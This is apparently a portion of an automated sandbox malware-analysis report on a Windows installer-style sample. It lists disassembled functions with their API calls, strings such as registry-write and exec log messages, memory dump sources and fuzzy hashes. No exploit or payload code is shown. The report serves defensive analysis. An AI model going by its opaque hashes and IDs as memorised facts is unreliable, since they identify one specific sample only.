                                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                          • SetCursor.USER32(00000000), ref: 004042D2
                                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                          • SetCursor.USER32(00000000), ref: 004042F6
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                          • String ID: @%F$N$open
                                          • API String ID: 3928313111-3849437375
                                          • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                          • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                          • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                          • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                          Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                          • wsprintfA.USER32 ref: 00406B4D
                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                          • String ID: F$%s=%s$NUL$[Rename]
                                          • API String ID: 565278875-1653569448
                                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                          Download Yara Rule
                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                          • DeleteObject.GDI32(?), ref: 004010F6
                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                          • DeleteObject.GDI32(?), ref: 0040116E
                                          • EndPaint.USER32(?,?), ref: 00401177
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                          Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                          • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                          • API String ID: 1641139501-220328614
                                          • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                          • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                          • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                          • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                          Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                          Strings
                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID: created uninstaller: %d, "%s"
                                          • API String ID: 3294113728-3145124454
                                          • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                          • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                          • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                          • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                          Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3734993849-2769509956
                                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                          Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                          • GetSysColor.USER32(?), ref: 00403E2B
                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                          • DeleteObject.GDI32(?), ref: 00403E55
                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                          Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                          Strings
                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                          • API String ID: 1033533793-945480824
                                          • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                          • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                          Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                          Strings
                                          • Exec: success ("%s"), xrefs: 00402263
                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                          • Exec: command="%s", xrefs: 00402241
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                          • API String ID: 2014279497-3433828417
                                          • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                          • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                          Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                          • GetMessagePos.USER32 ref: 00404871
                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                          Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                          • MulDiv.KERNEL32(0001A800,00000064,?), ref: 00403295
                                          • wsprintfW.USER32 ref: 004032A5
                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                          Strings
                                          • verifying installer: %d%%, xrefs: 0040329F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
